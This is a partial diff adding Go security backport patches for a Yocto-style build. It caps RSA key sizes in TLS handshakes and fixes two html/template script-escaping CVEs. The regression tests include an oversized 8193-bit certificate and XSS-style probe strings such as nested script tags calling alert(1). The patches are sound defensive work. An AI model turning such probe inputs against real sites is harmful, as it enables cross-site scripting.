+ src/crypto/tls/handshake_server.go      |  4 ++
+ 3 files changed, 90 insertions(+)
+
+diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go
+index 4fb528c..ba33ea1 100644
+--- a/src/crypto/tls/handshake_client.go
++++ b/src/crypto/tls/handshake_client.go
+@@ -788,6 +788,10 @@ func (hs *clientHandshakeState) sendFinished(out []byte) error {
+ 	return nil
+ }
+ 
++// maxRSAKeySize is the maximum RSA key size in bits that we are willing
++// to verify the signatures of during a TLS handshake.
++const maxRSAKeySize = 8192
++
+ // verifyServerCertificate parses and verifies the provided chain, setting
+ // c.verifiedChains and c.peerCertificates or sending the appropriate alert.
+ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
+@@ -798,6 +802,10 @@ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
+ 			c.sendAlert(alertBadCertificate)
+ 			return errors.New("tls: failed to parse certificate from server: " + err.Error())
+ 		}
++		if cert.PublicKeyAlgorithm == x509.RSA && cert.PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
++			c.sendAlert(alertBadCertificate)
++			return fmt.Errorf("tls: server sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
++		}
+ 		certs[i] = cert
+ 	}
+ 
+diff --git a/src/crypto/tls/handshake_client_test.go b/src/crypto/tls/handshake_client_test.go
+index 6bd3c37..8d20b2b 100644
+--- a/src/crypto/tls/handshake_client_test.go
++++ b/src/crypto/tls/handshake_client_test.go
+@@ -1984,3 +1984,81 @@ func TestCloseClientConnectionOnIdleServer(t *testing.T) {
+ 		t.Errorf("Error expected, but no error returned")
+ 	}
+ }
++
++// discardConn wraps a net.Conn but discards all writes, but reports that they happened.
++type discardConn struct {
++	net.Conn
++}
++
++func (dc *discardConn) Write(data []byte) (int, error) {
++	return len(data), nil
++}
++
++// largeRSAKeyCertPEM contains a 8193 bit RSA key
++const largeRSAKeyCertPEM = `-----BEGIN CERTIFICATE-----
++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
++u58=
++-----END CERTIFICATE-----`
++
++func TestHandshakeRSATooBig(t *testing.T) {
++	testCert, _ := pem.Decode([]byte(largeRSAKeyCertPEM))
++
++	c := &Conn{conn: &discardConn{}, config: testConfig.Clone()}
++
++	expectedErr := "tls: server sent certificate containing RSA key larger than 8192 bits"
++	err := c.verifyServerCertificate([][]byte{testCert.Bytes})
++	if err == nil || err.Error() != expectedErr {
++		t.Errorf("Conn.verifyServerCertificate unexpected error: want %q, got %q", expectedErr, err)
++	}
++
++	expectedErr = "tls: client sent certificate containing RSA key larger than 8192 bits"
++	err = c.processCertsFromClient(Certificate{Certificate: [][]byte{testCert.Bytes}})
++	if err == nil || err.Error() != expectedErr {
++		t.Errorf("Conn.processCertsFromClient unexpected error: want %q, got %q", expectedErr, err)
++	}
++}
+diff --git a/src/crypto/tls/handshake_server.go b/src/crypto/tls/handshake_server.go
+index b16415a..2e36840 100644
+--- a/src/crypto/tls/handshake_server.go
++++ b/src/crypto/tls/handshake_server.go
+@@ -738,6 +738,10 @@ func (c *Conn) processCertsFromClient(certificate Certificate) error {
+ 			c.sendAlert(alertBadCertificate)
+ 			return errors.New("tls: failed to parse client certificate: " + err.Error())
+ 		}
++		if certs[i].PublicKeyAlgorithm == x509.RSA && certs[i].PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
++			c.sendAlert(alertBadCertificate)
++			return fmt.Errorf("tls: client sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
++		}
+ 	}
+ 
+ 	if len(certs) == 0 && requiresClientCert(c.config.ClientAuth) {
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
new file mode 100644
index 0000000000..00def8fcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
@@ -0,0 +1,262 @@
+From 023b542edf38e2a1f87fcefb9f75ff2f99401b4c Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 3 Aug 2023 12:24:13 -0700
+Subject: [PATCH] [release-branch.go1.20] html/template: support HTML-like
+ comments in script contexts
+
+Per Appendix B.1.1 of the ECMAScript specification, support HTML-like
+comments in script contexts. Also per section 12.5, support hashbang
+comments. This brings our parsing in-line with how browsers treat these
+comment types.
+
+Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
+reporting this issue.
+
+Fixes #62196
+Fixes #62395
+Fixes CVE-2023-39318
+
+Change-Id: Id512702c5de3ae46cf648e268cb10e1eb392a181
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976593
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014620
+Reviewed-on: https://go-review.googlesource.com/c/go/+/526098
+Run-TryBot: Cherry Mui <cherryyz@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/023b542edf38e2a1f87fcefb9f75ff2f99401b4c]
+CVE: CVE-2023-39318
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/html/template/context.go      |  6 ++-
+ src/html/template/escape.go       |  5 +-
+ src/html/template/escape_test.go  | 10 ++++
+ src/html/template/state_string.go | 26 +++++-----
+ src/html/template/transition.go   | 80 ++++++++++++++++++++-----------
+ 5 files changed, 84 insertions(+), 43 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index 0b65313..4eb7891 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -124,6 +124,10 @@ const (
+ 	stateJSBlockCmt
+ 	// stateJSLineCmt occurs inside a JavaScript // line comment.
+ 	stateJSLineCmt
++	// stateJSHTMLOpenCmt occurs inside a JavaScript <!-- HTML-like comment.
++	stateJSHTMLOpenCmt
++	// stateJSHTMLCloseCmt occurs inside a JavaScript --> HTML-like comment.
++	stateJSHTMLCloseCmt
+ 	// stateCSS occurs inside a <style> element or style attribute.
+ 	stateCSS
+ 	// stateCSSDqStr occurs inside a CSS double quoted string.
+@@ -149,7 +153,7 @@ const (
+ // authors & maintainers, not for end-users or machines.
+ func isComment(s state) bool {
+ 	switch s {
+-	case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateCSSBlockCmt, stateCSSLineCmt:
++	case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt, stateCSSBlockCmt, stateCSSLineCmt:
+ 		return true
+ 	}
+ 	return false
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 435f912..ad2ec69 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -698,9 +698,12 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
+ 		if c.state != c1.state && isComment(c1.state) && c1.delim == delimNone {
+ 			// Preserve the portion between written and the comment start.
+ 			cs := i1 - 2
+-			if c1.state == stateHTMLCmt {
++			if c1.state == stateHTMLCmt || c1.state == stateJSHTMLOpenCmt {
+ 				// "<!--" instead of "/*" or "//"
+ 				cs -= 2
++			} else if c1.state == stateJSHTMLCloseCmt {
++				// "-->" instead of "/*" or "//"
++				cs -= 1
+ 			}
+ 			b.Write(s[written:cs])
+ 			written = i1
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index f550691..5f41e52 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -503,6 +503,16 @@ func TestEscape(t *testing.T) {
+ 			"<script>var a/*b*///c\nd</script>",
+ 			"<script>var a \nd</script>",
+ 		},
++		{
++			"JS HTML-like comments",
++			"<script>before <!-- beep\nbetween\nbefore-->boop\n</script>",
++			"<script>before \nbetween\nbefore\n</script>",
++		},
++		{
++			"JS hashbang comment",
++			"<script>#! beep\n</script>",
++			"<script>\n</script>",
++		},
+ 		{
+ 			"CSS comments",
+ 			"<style>p// paragraph\n" +
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..b5cfe70 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -25,21 +25,23 @@ func _() {
+ 	_ = x[stateJSRegexp-14]
+ 	_ = x[stateJSBlockCmt-15]
+ 	_ = x[stateJSLineCmt-16]
+-	_ = x[stateCSS-17]
+-	_ = x[stateCSSDqStr-18]
+-	_ = x[stateCSSSqStr-19]
+-	_ = x[stateCSSDqURL-20]
+-	_ = x[stateCSSSqURL-21]
+-	_ = x[stateCSSURL-22]
+-	_ = x[stateCSSBlockCmt-23]
+-	_ = x[stateCSSLineCmt-24]
+-	_ = x[stateError-25]
+-	_ = x[stateDead-26]
++	_ = x[stateJSHTMLOpenCmt-17]
++	_ = x[stateJSHTMLCloseCmt-18]
++	_ = x[stateCSS-19]
++	_ = x[stateCSSDqStr-20]
++	_ = x[stateCSSSqStr-21]
++	_ = x[stateCSSDqURL-22]
++	_ = x[stateCSSSqURL-23]
++	_ = x[stateCSSURL-24]
++	_ = x[stateCSSBlockCmt-25]
++	_ = x[stateCSSLineCmt-26]
++	_ = x[stateError-27]
++	_ = x[stateDead-28]
+ }
+ 
+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateJSHTMLOpenCmtstateJSHTMLCloseCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+ 
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 214, 233, 241, 254, 267, 280, 293, 304, 320, 335, 345, 354}
+ 
+ func (i state) String() string {
+ 	if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 92eb351..12aa4c4 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -14,32 +14,34 @@ import (
+ // the updated context and the number of bytes consumed from the front of the
+ // input.
+ var transitionFunc = [...]func(context, []byte) (context, int){
+-	stateText:        tText,
+-	stateTag:         tTag,
+-	stateAttrName:    tAttrName,
+-	stateAfterName:   tAfterName,
+-	stateBeforeValue: tBeforeValue,
+-	stateHTMLCmt:     tHTMLCmt,
+-	stateRCDATA:      tSpecialTagEnd,
+-	stateAttr:        tAttr,
+-	stateURL:         tURL,
+-	stateSrcset:      tURL,
+-	stateJS:          tJS,
+-	stateJSDqStr:     tJSDelimited,
+-	stateJSSqStr:     tJSDelimited,
+-	stateJSBqStr:     tJSDelimited,
+-	stateJSRegexp:    tJSDelimited,
+-	stateJSBlockCmt:  tBlockCmt,
+-	stateJSLineCmt:   tLineCmt,
+-	stateCSS:         tCSS,
+-	stateCSSDqStr:    tCSSStr,
+-	stateCSSSqStr:    tCSSStr,
+-	stateCSSDqURL:    tCSSStr,
+-	stateCSSSqURL:    tCSSStr,
+-	stateCSSURL:      tCSSStr,
+-	stateCSSBlockCmt: tBlockCmt,
+-	stateCSSLineCmt:  tLineCmt,
+-	stateError:       tError,
++	stateText:           tText,
++	stateTag:            tTag,
++	stateAttrName:       tAttrName,
++	stateAfterName:      tAfterName,
++	stateBeforeValue:    tBeforeValue,
++	stateHTMLCmt:        tHTMLCmt,
++	stateRCDATA:         tSpecialTagEnd,
++	stateAttr:           tAttr,
++	stateURL:            tURL,
++	stateSrcset:         tURL,
++	stateJS:             tJS,
++	stateJSDqStr:        tJSDelimited,
++	stateJSSqStr:        tJSDelimited,
++	stateJSBqStr:        tJSDelimited,
++	stateJSRegexp:       tJSDelimited,
++	stateJSBlockCmt:     tBlockCmt,
++	stateJSLineCmt:      tLineCmt,
++	stateJSHTMLOpenCmt:  tLineCmt,
++	stateJSHTMLCloseCmt: tLineCmt,
++	stateCSS:            tCSS,
++	stateCSSDqStr:       tCSSStr,
++	stateCSSSqStr:       tCSSStr,
++	stateCSSDqURL:       tCSSStr,
++	stateCSSSqURL:       tCSSStr,
++	stateCSSURL:         tCSSStr,
++	stateCSSBlockCmt:    tBlockCmt,
++	stateCSSLineCmt:     tLineCmt,
++	stateError:          tError,
+ }
+ 
+ var commentStart = []byte("<!--")
+@@ -263,7 +265,7 @@ func tURL(c context, s []byte) (context, int) {
+ 
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+-	i := bytes.IndexAny(s, "\"`'/")
++	i := bytes.IndexAny(s, "\"`'/<-#")
+ 	if i == -1 {
+ 		// Entire input is non string, comment, regexp tokens.
+ 		c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -293,6 +295,26 @@ func tJS(c context, s []byte) (context, int) {
+ 				err:   errorf(ErrSlashAmbig, nil, 0, "'/' could start a division or regexp: %.32q", s[i:]),
+ 			}, len(s)
+ 		}
++	// ECMAScript supports HTML style comments for legacy reasons, see Appendix
++	// B.1.1 "HTML-like Comments". The handling of these comments is somewhat
++	// confusing. Multi-line comments are not supported, i.e. anything on lines
++	// between the opening and closing tokens is not considered a comment, but
++	// anything following the opening or closing token, on the same line, is
++	// ignored. As such we simply treat any line prefixed with "<!--" or "-->"
++	// as if it were actually prefixed with "//" and move on.
++	case '<':
++		if i+3 < len(s) && bytes.Equal(commentStart, s[i:i+4]) {
++			c.state, i = stateJSHTMLOpenCmt, i+3
++		}
++	case '-':
++		if i+2 < len(s) && bytes.Equal(commentEnd, s[i:i+3]) {
++			c.state, i = stateJSHTMLCloseCmt, i+2
++		}
++	// ECMAScript also supports "hashbang" comment lines, see Section 12.5.
++	case '#':
++		if i+1 < len(s) && s[i+1] == '!' {
++			c.state, i = stateJSLineCmt, i+1
++		}
+ 	default:
+ 		panic("unreachable")
+ 	}
+@@ -372,12 +394,12 @@ func tBlockCmt(c context, s []byte) (context, int) {
+ 	return c, i + 2
+ }
+ 
+-// tLineCmt is the context transition function for //comment states.
++// tLineCmt is the context transition function for //comment states, and the JS HTML-like comment state.
+ func tLineCmt(c context, s []byte) (context, int) {
+ 	var lineTerminators string
+ 	var endState state
+ 	switch c.state {
+-	case stateJSLineCmt:
++	case stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt:
+ 		lineTerminators, endState = "\n\r\u2028\u2029", stateJS
+ 	case stateCSSLineCmt:
+ 		lineTerminators, endState = "\n\f\r", stateCSS
+-- 
+2.24.4
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
new file mode 100644
index 0000000000..69106e3e05
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
@@ -0,0 +1,230 @@
+From 2070531d2f53df88e312edace6c8dfc9686ab2f5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 3 Aug 2023 12:28:28 -0700
+Subject: [PATCH] [release-branch.go1.20] html/template: properly handle
+ special tags within the script context
+
+The HTML specification has incredibly complex rules for how to handle
+"<!--", "<script", and "</script" when they appear within literals in
+the script context. Rather than attempting to apply these restrictions
+(which require a significantly more complex state machine) we apply
+the workaround suggested in section 4.12.1.3 of the HTML specification [1].
+
+More precisely, when "<!--", "<script", and "</script" appear within
+literals (strings and regular expressions, ignoring comments since we
+already elide their content) we replace the "<" with "\x3C". This avoids
+the unintuitive behavior that using these tags within literals can cause,
+by simply preventing the rendered content from triggering it. This may
+break some correct usages of these tags, but on balance is more likely
+to prevent XSS attacks where users are unknowingly either closing or not
+closing the script blocks where they think they are.
+
+Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
+reporting this issue.
+
+Fixes #62197
+Fixes #62397
+Fixes CVE-2023-39319
+
+[1] https://html.spec.whatwg.org/#restrictions-for-contents-of-script-elements
+
+Change-Id: Iab57b0532694827e3eddf57a7497ba1fab1746dc
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976594
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014621
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/526099
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Cherry Mui <cherryyz@google.com>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/2070531d2f53df88e312edace6c8dfc9686ab2f5]
+CVE: CVE-2023-39319
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/html/template/context.go     | 14 ++++++++++
+ src/html/template/escape.go      | 26 ++++++++++++++++++
+ src/html/template/escape_test.go | 47 +++++++++++++++++++++++++++++++-
+ src/html/template/transition.go  | 15 ++++++++++
+ 4 files changed, 101 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index 4eb7891..feb6517 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -168,6 +168,20 @@ func isInTag(s state) bool {
+ 	return false
+ }
+ 
++// isInScriptLiteral returns true if s is one of the literal states within a
++// <script> tag, and as such occurances of "<!--", "<script", and "</script"
++// need to be treated specially.
++func isInScriptLiteral(s state) bool {
++	// Ignore the comment states (stateJSBlockCmt, stateJSLineCmt,
++	// stateJSHTMLOpenCmt, stateJSHTMLCloseCmt) because their content is already
++	// omitted from the output.
++	switch s {
++	case stateJSDqStr, stateJSSqStr, stateJSBqStr, stateJSRegexp:
++		return true
++	}
++	return false
++}
++
+ // delim is the delimiter that will end the current HTML attribute.
+ type delim uint8
+ 
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index ad2ec69..de8cf6f 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -10,6 +10,7 @@ import (
+ 	"html"
+ 	"internal/godebug"
+ 	"io"
++	"regexp"
+ 	"text/template"
+ 	"text/template/parse"
+ )
+@@ -650,6 +651,26 @@ var delimEnds = [...]string{
+ 	delimSpaceOrTagEnd: " \t\n\f\r>",
+ }
+ 
++var (
++	// Per WHATWG HTML specification, section 4.12.1.3, there are extremely
++	// complicated rules for how to handle the set of opening tags <!--,
++	// <script, and </script when they appear in JS literals (i.e. strings,
++	// regexs, and comments). The specification suggests a simple solution,
++	// rather than implementing the arcane ABNF, which involves simply escaping
++	// the opening bracket with \x3C. We use the below regex for this, since it
++	// makes doing the case-insensitive find-replace much simpler.
++	specialScriptTagRE          = regexp.MustCompile("(?i)<(script|/script|!--)")
++	specialScriptTagReplacement = []byte("\\x3C$1")
++)
++
++func containsSpecialScriptTag(s []byte) bool {
++	return specialScriptTagRE.Match(s)
++}
++
++func escapeSpecialScriptTags(s []byte) []byte {
++	return specialScriptTagRE.ReplaceAll(s, specialScriptTagReplacement)
++}
++
+ var doctypeBytes = []byte("<!DOCTYPE")
+ 
+ // escapeText escapes a text template node.
+@@ -708,6 +729,11 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
+ 			b.Write(s[written:cs])
+ 			written = i1
+ 		}
++		if isInScriptLiteral(c.state) && containsSpecialScriptTag(s[i:i1]) {
++			b.Write(s[written:i])
++			b.Write(escapeSpecialScriptTags(s[i:i1]))
++			written = i1
++		}
+ 		if i == i1 && c.state == c1.state {
+ 			panic(fmt.Sprintf("infinite loop from %v to %v on %q..%q", c, c1, s[:i], s[i:]))
+ 		}
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index 5f41e52..0cacb20 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -513,6 +513,21 @@ func TestEscape(t *testing.T) {
+ 			"<script>#! beep\n</script>",
+ 			"<script>\n</script>",
+ 		},
++		{
++			"Special tags in <script> string literals",
++			`<script>var a = "asd < 123 <!-- 456 < fgh <script jkl < 789 </script"</script>`,
++			`<script>var a = "asd < 123 \x3C!-- 456 < fgh \x3Cscript jkl < 789 \x3C/script"</script>`,
++		},
++		{
++			"Special tags in <script> string literals (mixed case)",
++			`<script>var a = "<!-- <ScripT </ScripT"</script>`,
++			`<script>var a = "\x3C!-- \x3CScripT \x3C/ScripT"</script>`,
++		},
++		{
++			"Special tags in <script> regex literals (mixed case)",
++			`<script>var a = /<!-- <ScripT </ScripT/</script>`,
++			`<script>var a = /\x3C!-- \x3CScripT \x3C/ScripT/</script>`,
++		},
+ 		{
+ 			"CSS comments",
+ 			"<style>p// paragraph\n" +
+@@ -1501,8 +1516,38 @@ func TestEscapeText(t *testing.T) {
+ 			context{state: stateJS, element: elementScript},
+ 		},
+ 		{
++			// <script and </script tags are escaped, so </script> should not
++			// cause us to exit the JS state.
+ 			`<script>document.write("<script>alert(1)</script>");`,
+-			context{state: stateText},
++			context{state: stateJS, element: elementScript},
++		},
++		{
++			`<script>document.write("<script>`,
++			context{state: stateJSDqStr, element: elementScript},
++		},
++		{
++			`<script>document.write("<script>alert(1)</script>`,
++			context{state: stateJSDqStr, element: elementScript},
++		},
++		{
++			`<script>document.write("<script>alert(1)<!--`,
++			context{state: stateJSDqStr, element: elementScript},
++		},
++		{
++			`<script>document.write("<script>alert(1)</Script>");`,
++			context{state: stateJS, element: elementScript},
++		},
++		{
++			`<script>document.write("<!--");`,
++			context{state: stateJS, element: elementScript},
++		},
++		{
++			`<script>let a = /</script`,
++			context{state: stateJSRegexp, element: elementScript},
++		},
++		{
++			`<script>let a = /</script/`,
++			context{state: stateJS, element: elementScript, jsCtx: jsCtxDivOp},
+ 		},
+ 		{
+ 			`<script type="text/template">`,
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 12aa4c4..3d2a37c 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -214,6 +214,11 @@ var (
+ // element states.
+ func tSpecialTagEnd(c context, s []byte) (context, int) {
+ 	if c.element != elementNone {
++		// script end tags ("</script") within script literals are ignored, so that
++		// we can properly escape them.
++		if c.element == elementScript && (isInScriptLiteral(c.state) || isComment(c.state)) {
++			return c, len(s)
++		}
+ 		if i := indexTagEnd(s, specialTagEndMarkers[c.element]); i != -1 {
+ 			return context{}, i
+ 		}
+@@ -353,6 +358,16 @@ func tJSDelimited(c context, s []byte) (context, int) {
+ 			inCharset = true
+ 		case ']':
+ 			inCharset = false
++		case '/':
++			// If "</script" appears in a regex literal, the '/' should not
++			// close the regex literal, and it will later be escaped to
++			// "\x3C/script" in escapeText.
++			if i > 0 && i+7 <= len(s) && bytes.Compare(bytes.ToLower(s[i-1:i+7]), []byte("</script")) == 0 {
++				i++
++			} else if !inCharset {
++				c.state, c.jsCtx = stateJS, jsCtxDivOp
++				return c, i + 1
++			}
+ 		default:
+ 			// end delimiter
+ 			if !inCharset {
+-- 
+2.24.4
+
